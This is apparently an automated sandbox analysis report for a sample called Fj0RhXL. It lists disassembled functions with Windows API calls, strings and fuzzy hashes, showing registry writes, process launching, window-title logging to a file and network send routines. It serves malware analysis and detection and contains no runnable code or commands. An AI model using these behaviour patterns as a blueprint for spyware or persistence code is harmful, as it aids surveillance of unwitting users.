String ID: %2d%c$%c%c%c$%s%5d$-- $--%c$xFl
API String ID: 1467051239-3993000603
Opcode ID: 22ac9817bf373efdb67811e54d1062d39bbd827489030770dc8204aa9cdf8fdc
Instruction ID: c08413ba672dc234b846266dda55f89486d97414ce984bdf1f3277f2863bacfe
Opcode Fuzzy Hash: 22ac9817bf373efdb67811e54d1062d39bbd827489030770dc8204aa9cdf8fdc
Instruction Fuzzy Hash: 6DA13872E006548BDB20DF6ACC91BEDB3B5FF4A318F100156D8D99BE48DB3548868F56

Function 03D97530 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 03D97559
RegDeleteValueW.ADVAPI32(?), ref: 03D97564
RegCloseKey.ADVAPI32(?), ref: 03D97574
RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 03D97593
lstrlenW.KERNEL32(?), ref: 03D975A1
RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 03D975B4
RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 03D975C2
RegCloseKey.ADVAPI32(?), ref: 03D975D0

Strings

AppEvents, xrefs: 03D9753F, 03D97553, 03D9757D, 03D9758D
Network, xrefs: 03D97546, 03D97584

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Close$Value$CreateDeleteOpenlstrlen
String ID: AppEvents$Network
API String ID: 3935456190-3733486940
Opcode ID: d656a0c173989ad9828e9ff3b9a0d97ccebb88e1a9d09a5e22a2f155bab32f20
Instruction ID: 5c8f500239abf148fd4cd198082d6b7ad55ba6fd60ad5c1ae8b136a589aa5f63
Opcode Fuzzy Hash: d656a0c173989ad9828e9ff3b9a0d97ccebb88e1a9d09a5e22a2f155bab32f20
Instruction Fuzzy Hash: 0F113076600208FBE750DBA5EC49FABB37CEB05711F140559FA01D7340D6719E10D7A4

Function 02F05A10 Relevance: 16.7, APIs: 11, Instructions: 227timeCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,905EEAA6,00000000,?,00000000,02F061BF,00000000), ref: 02F05A55
InitializeCriticalSectionAndSpinCount.KERNEL32(02F0631F,00000000), ref: 02F05AF4
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F05B32
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F05B57
InitializeCriticalSectionAndSpinCount.KERNEL32(02F063BF,00000000), ref: 02F05C4F
InitializeCriticalSectionAndSpinCount.KERNEL32(02F063D7,00000000), ref: 02F05C70
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F05B7C

Part of subcall function 02F01280: __CxxThrowException@8.LIBCMT ref: 02F01290
Part of subcall function 02F01280: DeleteCriticalSection.KERNEL32(00000000,00000000,02F17DF8,?,?,02F06541), ref: 02F012A1

InterlockedExchange.KERNEL32(02F061D7,00000000), ref: 02F05CE1
timeGetTime.WINMM ref: 02F05CE7
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02F05CFB
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F05D04

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
String ID:
API String ID: 1400036169-0
Opcode ID: d0a1e2cedc43345d431e6ebe0205d09068220885f9791c2f80c61893c12e279a
Instruction ID: 4a9f441f3b0ebfcc4684d0cb2ffc34afb87fab2eaa8bca9ded5e9ed5a1615f7d
Opcode Fuzzy Hash: d0a1e2cedc43345d431e6ebe0205d09068220885f9791c2f80c61893c12e279a
Instruction Fuzzy Hash: 98A1F5B0A01A4AAFD714DF6AC8C479AFBE8FB08344F90462EE11DD7640D774A964DF90

Function 03D84C90 Relevance: 16.7, APIs: 11, Instructions: 156COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F,90594F2A,?,?,?,?,00000000,000000FF,00000000), ref: 03D84CC6
EnterCriticalSection.KERNEL32(?,90594F2A,?,?,?,?,00000000,000000FF,00000000), ref: 03D84CED
SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 03D84D01
LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 03D84D08

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: eb6e9ee6c66cf46b5e44044571cdcaeaf81690beddd37d4757eb08f978f0c79c
Instruction ID: ec43202bea9f62a6f47370caad274405a4769465b1ca049853e2adb00ef8d8c4
Opcode Fuzzy Hash: eb6e9ee6c66cf46b5e44044571cdcaeaf81690beddd37d4757eb08f978f0c79c
Instruction Fuzzy Hash: E151AD77A04305CFD714EF69D885B6AB7B4FF48B11F000A6EE55AC7740E735A5008BA1

Function 02F04C80 Relevance: 16.7, APIs: 11, Instructions: 156COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F,905EEAA6,?,?,?,?,00000000,000000FF,00000000), ref: 02F04CB6
EnterCriticalSection.KERNEL32(?,905EEAA6,?,?,?,?,00000000,000000FF,00000000), ref: 02F04CDD
SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 02F04CF1
LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 02F04CF8

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: 05f6082c98f7104047cb3fbe89dfafa17e08b91f31fe0b6b323651eb9fa34a7d
Instruction ID: 03a96266d674ed1064192d8ec3a668f23f34314c20f91a88549d97835d851ff5
Opcode Fuzzy Hash: 05f6082c98f7104047cb3fbe89dfafa17e08b91f31fe0b6b323651eb9fa34a7d
Instruction Fuzzy Hash: 6A51D076A446059FD320DFA8E985B6AF7F4FF88741F40492EEA0AD7780D731B8108B90

Function 6C37BF00 Relevance: 16.6, APIs: 11, Instructions: 114COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6C37BF27
__floor_pentium4.LIBCMT ref: 6C37BF7B
__floor_pentium4.LIBCMT ref: 6C37BF92
__floor_pentium4.LIBCMT ref: 6C37BF3E

Part of subcall function 6C3F6320: ___libm_error_support.LIBCMT ref: 6C3F63D5

__floor_pentium4.LIBCMT ref: 6C37BFAD
__floor_pentium4.LIBCMT ref: 6C37BFC7
__floor_pentium4.LIBCMT ref: 6C37BFDB
__floor_pentium4.LIBCMT ref: 6C37BFF2
__floor_pentium4.LIBCMT ref: 6C37C024
__floor_pentium4.LIBCMT ref: 6C37C048
__floor_pentium4.LIBCMT ref: 6C37C06C

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: __floor_pentium4$___libm_error_support
String ID:
API String ID: 190838090-0
Opcode ID: b0eaf1d7a93bf012a4ef6ada29ee814af41e672dc0f08f201e0f3c1cbf5e638a
Instruction ID: f0a70922f8a1d2fe7b4b7e1afbda4556859c62385be598f48ed39091c1664cd5
Opcode Fuzzy Hash: b0eaf1d7a93bf012a4ef6ada29ee814af41e672dc0f08f201e0f3c1cbf5e638a
Instruction Fuzzy Hash: 48417B70A04E0AD2DF14BF62E8494EEBF74FF8A754F92098AD0E5515A0CF3A04B9C746

Function 6C361EC9 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 137COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C361F2C
_sprintf.LIBCMT ref: 6C361FBF
_sprintf.LIBCMT ref: 6C36203C

Part of subcall function 6C3714FC: TextOutA.GDI32(-00000005,00000017,?,00000001,00000001), ref: 6C3715C4
Part of subcall function 6C3714FC: EndPage.GDI32(00000000), ref: 6C371684
Part of subcall function 6C3714FC: StartPage.GDI32 ref: 6C371690
Part of subcall function 6C3714FC: SetMapMode.GDI32(00000008), ref: 6C37169E
Part of subcall function 6C3714FC: SetViewportOrgEx.GDI32(00000000,00000000,00000000), ref: 6C3716AD
Part of subcall function 6C3714FC: GetDeviceCaps.GDI32(0000000A,00000000), ref: 6C3716BC
Part of subcall function 6C3714FC: GetDeviceCaps.GDI32(00000008,00000000), ref: 6C3716C7
Part of subcall function 6C3714FC: SetViewportExtEx.GDI32(00000000,?,00000000), ref: 6C3716D0
Part of subcall function 6C3714FC: SetWindowOrgEx.GDI32(00000000,00000000,00000000), ref: 6C3716DF

Strings

, xrefs: 6C361F9A, 6C36201C
%.3s:%3d, xrefs: 6C362036
No aspects in list., xrefs: 6C361EEE
Sum power: %.2f - Average power: %.2f, xrefs: 6C361F26
Y, xrefs: 6C362055
%s:%3d, xrefs: 6C361FB9

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$CapsDevicePageViewport$ModeStartTextWindow
String ID: $%.3s:%3d$%s:%3d$No aspects in list.$Sum power: %.2f - Average power: %.2f$Y
API String ID: 2093457147-2556395577
Opcode ID: 25768d9b959374d40ca33722facfae8b4875e9fada1f86622c3d99592f781bac
Instruction ID: cc825c4fe4cea67b4ecf8ef4c8f9044b07db77c66c4b82f1bd57e2e6c7ad3320
Opcode Fuzzy Hash: 25768d9b959374d40ca33722facfae8b4875e9fada1f86622c3d99592f781bac
Instruction Fuzzy Hash: 3841B172D00288CBDB10EFE6C954ADCB778AF04318F504529D4996FE48CB79D859CF66

Function 03D97650 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88processstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 03D9765D
_memmove.LIBCMT ref: 03D9768F
_wcsrchr.LIBCMT ref: 03D97697

Part of subcall function 03D89180: LoadLibraryW.KERNEL32(wininet.dll), ref: 03D891C3
Part of subcall function 03D89180: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03D891D7
Part of subcall function 03D89180: FreeLibrary.KERNEL32(00000000), ref: 03D891F7

GetFileAttributesW.KERNEL32(-00000002), ref: 03D976B6
GetLastError.KERNEL32 ref: 03D976C1
_memset.LIBCMT ref: 03D976D4
CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 03D97701

Strings

WinSta0\Default, xrefs: 03D976FA
D, xrefs: 03D976F3

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memmove_memset_wcsrchrlstrlen
String ID: D$WinSta0\Default
API String ID: 4287160851-1101385590
Opcode ID: f1ff3c1dbc1770986cc57133d15ab805d0efd9f646d0efc75fd7d475d06fb634
Instruction ID: 01bd2fcf2d752d6783ecb0dd54e6294164777d35645c7e4ac95b3fdfb75ace94
Opcode Fuzzy Hash: f1ff3c1dbc1770986cc57133d15ab805d0efd9f646d0efc75fd7d475d06fb634
Instruction Fuzzy Hash: 65110DB7900208A7EB21E6A4AC85FBF776DDF85B10F14052AFA06DE284F675950583F2

Function 6C371F74 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 77COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6C371FBC
_sprintf.LIBCMT ref: 6C371FFB
__floor_pentium4.LIBCMT ref: 6C37201A
_sprintf.LIBCMT ref: 6C372038
_sprintf.LIBCMT ref: 6C372064

Strings

%10.6f, xrefs: 6C37205A
%7.3f, xrefs: 6C372053
%3d%c%02d', xrefs: 6C371FF1
%02d", xrefs: 6C37202E

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$__floor_pentium4
String ID: %02d"$%10.6f$%3d%c%02d'$%7.3f
API String ID: 175470247-3464643819
Opcode ID: 0c600146d141c0d2b3b67f07016871ed5066364859e33a576ffe2d8687bc6172
Instruction ID: e1bc0372ac9fa1a550321bdfcba4753d8f548b1c6e1b02ca389d866861bfdadf
Opcode Fuzzy Hash: 0c600146d141c0d2b3b67f07016871ed5066364859e33a576ffe2d8687bc6172
Instruction Fuzzy Hash: FA2122B2511849E7CF10AF62E80DFED7F78EB06309F114699F09540880CB3A85A8CB77

Function 03D992D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 74stringtimeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D992F1
GetForegroundWindow.USER32(?,74DF23A0,00000000), ref: 03D992F9
GetWindowTextW.USER32(00000000,03DC3B10,00000800), ref: 03D9930F
_memset.LIBCMT ref: 03D9932D
lstrlenW.KERNEL32(03DC3B10,?,?,?,?,74DF23A0,00000000), ref: 03D9934C
GetLocalTime.KERNEL32(?,?,?,?,?,74DF23A0,00000000), ref: 03D9935D
wsprintfW.USER32 ref: 03D993A4

Part of subcall function 03D99250: WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,?,03D993B5,?,?,?,?,74DF23A0,00000000), ref: 03D9925D
Part of subcall function 03D99250: CreateFileW.KERNEL32(03DC31A0,40000000,00000002,00000000,00000004,00000002,00000000,?,?,03D993B5,?,?,?,?,74DF23A0,00000000), ref: 03D99277
Part of subcall function 03D99250: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03D99292
Part of subcall function 03D99250: lstrlenW.KERNEL32(?,00000000,00000000), ref: 03D9929F
Part of subcall function 03D99250: WriteFile.KERNEL32(00000000,?,00000000), ref: 03D992AA
Part of subcall function 03D99250: CloseHandle.KERNEL32(00000000), ref: 03D992B1
Part of subcall function 03D99250: ReleaseMutex.KERNEL32(?), ref: 03D992BE

_memset.LIBCMT ref: 03D993C0

Strings

[, xrefs: 03D9939E

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
String ID: [
API String ID: 2192163267-4056885943
Opcode ID: a3edf2dedf4445889d0e243686a5b2f0dc8155b6cc0b2f020dbeadd687f30a2e
Instruction ID: 4e2c45afefccb0e62a4b995b6834ab1d0659cf8c79ae80466d531f8ed796915b
Opcode Fuzzy Hash: a3edf2dedf4445889d0e243686a5b2f0dc8155b6cc0b2f020dbeadd687f30a2e
Instruction Fuzzy Hash: 5A21EA76E20219EAC750EF64DC45BAE77F9FF44700F00C599F88496280EE745999CBE0

Function 032B4FAE Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 68COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 032B5026
_memset.LIBCMT ref: 032B504A
_memset.LIBCMT ref: 032B505C

Strings

!jWW, xrefs: 032B4FED
l, xrefs: 032B5001
_, xrefs: 032B500B
{vU_, xrefs: 032B4FE3
., xrefs: 032B4FF7
i, xrefs: 032B5015

Memory Dump Source

Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd

Similarity

API ID: _memset
String ID: !jWW$.$_$i$l${vU_
API String ID: 2102423945-3065862289
Opcode ID: 6ccc7fd15bb1100c1fb6edbf5c978d90db860b83903a5ad30d142e73f1fe8078
Instruction ID: 92e0964ec2f9e3f0809040cd7fc79c5c02f0ee2ca514c4611dd40238b798d0a2
Opcode Fuzzy Hash: 6ccc7fd15bb1100c1fb6edbf5c978d90db860b83903a5ad30d142e73f1fe8078
Instruction Fuzzy Hash: EC217A74A407689ED720DF54CC80FAABBB9EF86700F1481CAE54CAA651D7B19A84CF52

Function 03D83DB0 Relevance: 15.1, APIs: 10, Instructions: 117memorynetworkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,03D8395D,?,00000000,000000FF,00000000), ref: 03D83DD5
LeaveCriticalSection.KERNEL32(?,?,?,03D8395D,?,00000000,000000FF,00000000), ref: 03D83E20
send.WS2_32(?,000000FF,00000000,00000000), ref: 03D83E3E
EnterCriticalSection.KERNEL32(?), ref: 03D83E51
LeaveCriticalSection.KERNEL32(?), ref: 03D83E64
HeapFree.KERNEL32(00000000,00000000,?,?,?,03D8395D,?,00000000,000000FF,00000000), ref: 03D83E8C
WSAGetLastError.WS2_32(?,?,03D8395D,?,00000000,000000FF,00000000), ref: 03D83E97
EnterCriticalSection.KERNEL32(?,?,?,03D8395D,?,00000000,000000FF,00000000), ref: 03D83EAB
LeaveCriticalSection.KERNEL32(?), ref: 03D83EE4
HeapFree.KERNEL32(00000000,00000000,?), ref: 03D83F21

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
String ID:
API String ID: 1701177279-0
Opcode ID: 7c80f71ab17848da4c159b0c05a86be8678b5b7a02532fc2195ceb5e61c6d434
Instruction ID: 6de5f96dca74967267f540879ffb2d58d7b48113ebc031072e96e4a703cfbbc3
Opcode Fuzzy Hash: 7c80f71ab17848da4c159b0c05a86be8678b5b7a02532fc2195ceb5e61c6d434
Instruction Fuzzy Hash: 1841187A504704DBC725EF78D888AA7B7E8FB49B00F044A6DE9AECB254E731F5418B50

Function 02F03DD0 Relevance: 15.1, APIs: 10, Instructions: 117memorynetworkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,02F0397D,?,00000000,000000FF,00000000), ref: 02F03DF5
LeaveCriticalSection.KERNEL32(?,?,?,02F0397D,?,00000000,000000FF,00000000), ref: 02F03E40
send.WS2_32(?,000000FF,00000000,00000000), ref: 02F03E5E
EnterCriticalSection.KERNEL32(?), ref: 02F03E71
LeaveCriticalSection.KERNEL32(?), ref: 02F03E84
HeapFree.KERNEL32(00000000,00000000,?,?,?,02F0397D,?,00000000,000000FF,00000000), ref: 02F03EAC
WSAGetLastError.WS2_32(?,?,02F0397D,?,00000000,000000FF,00000000), ref: 02F03EB7
EnterCriticalSection.KERNEL32(?,?,?,02F0397D,?,00000000,000000FF,00000000), ref: 02F03ECB
LeaveCriticalSection.KERNEL32(?), ref: 02F03F04
HeapFree.KERNEL32(00000000,00000000,?), ref: 02F03F41

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
String ID:
API String ID: 1701177279-0
Opcode ID: 148e1964f84adc6e0225d8d0003ccf5ab731ad3101127699792af38a8e3a3726
Instruction ID: 2355ad9e2d7f80e3378631bd12af0c22c994355e4e9a1f150b49283b2e454b93
Opcode Fuzzy Hash: 148e1964f84adc6e0225d8d0003ccf5ab731ad3101127699792af38a8e3a3726
Instruction Fuzzy Hash: 5E412971A046059FC724CFB4D8C8BA7BBF9BB49384F85496DEA5ECB280D731A405DB60

Function 03D84F10 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 03D84F43
EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 03D84F58
WSASetLastError.WS2_32(00002746), ref: 03D84F6A
LeaveCriticalSection.KERNEL32(000002FF), ref: 03D84F71
timeGetTime.WINMM ref: 03D84F9F
timeGetTime.WINMM ref: 03D84FC7
SetEvent.KERNEL32(?), ref: 03D85005
InterlockedExchange.KERNEL32(?,00000001), ref: 03D85011
LeaveCriticalSection.KERNEL32(000002FF), ref: 03D85018
LeaveCriticalSection.KERNEL32(000002FF), ref: 03D8502B

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
String ID:
API String ID: 1979691958-0
Opcode ID: 6cd049ae1dc337c721e26ff8a976f6df13da73a70a2bc18cc492767b5c2455d6
Instruction ID: 4fac666edd2af302bc93d26e09bed5072f3ba20d8ff47cd6659be710da8a8a9a
Opcode Fuzzy Hash: 6cd049ae1dc337c721e26ff8a976f6df13da73a70a2bc18cc492767b5c2455d6
Instruction Fuzzy Hash: C041CF32600301DBD720EF6AD848A6AB7F9FB45B25F084998E58AC7351E735F5408B51

Function 02F04F00 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 02F04F33
EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 02F04F48
WSASetLastError.WS2_32(00002746), ref: 02F04F5A
LeaveCriticalSection.KERNEL32(000002FF), ref: 02F04F61
timeGetTime.WINMM ref: 02F04F8F
timeGetTime.WINMM ref: 02F04FB7
SetEvent.KERNEL32(?), ref: 02F04FF5
InterlockedExchange.KERNEL32(?,00000001), ref: 02F05001
LeaveCriticalSection.KERNEL32(000002FF), ref: 02F05008
LeaveCriticalSection.KERNEL32(000002FF), ref: 02F0501B

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
String ID:
API String ID: 1979691958-0
Opcode ID: 6cb7d25eaa55de57b915cac20292b8b5b0f28d5c43023bce572565a300144876
Instruction ID: 5699d331e2b2bf34886319062428d94d60b13e8b7da4c559ee723c3517036860
Opcode Fuzzy Hash: 6cb7d25eaa55de57b915cac20292b8b5b0f28d5c43023bce572565a300144876
Instruction Fuzzy Hash: 34413431E402048FD720DF68D988B2AF7F9FF88791F854959E68ACB281E371E4509B80

Function 03D89D60 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 192COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D89DD4

Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B19
Part of subcall function 03D99B04: __CxxThrowException@8.LIBCMT ref: 03D99B2E
Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B3F

std::_Xinvalid_argument.LIBCPMT ref: 03D89DF8
_memmove.LIBCMT ref: 03D89E2D
std::_Xinvalid_argument.LIBCPMT ref: 03D89E57
_memmove.LIBCMT ref: 03D89ED4
_memmove.LIBCMT ref: 03D89EF9

Strings

invalid string position, xrefs: 03D89DCF
string too long, xrefs: 03D89DF3, 03D89E52

Memory Dump Source

